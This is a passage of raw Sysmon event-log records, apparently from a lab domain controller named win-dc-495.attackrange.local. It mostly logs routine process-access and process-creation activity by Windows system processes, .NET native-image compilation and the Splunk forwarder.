Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.383{59A5CD1D-9271-6005-B204-00000000A301}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.349{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.349{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B104-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.271{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.271{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-B004-00000000A301}2532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.209{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.193{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:45.193{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9271-6005-AF04-00000000A301}4532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:45.131{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\5e4-0\WindowsFormsIntegration.dll2021-01-18 13:51:45.131 10341000x80000000000000008985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.474{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.146{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9272-6005-B604-00000000A301}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.146{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-9272-6005-B604-00000000A301}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.115{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 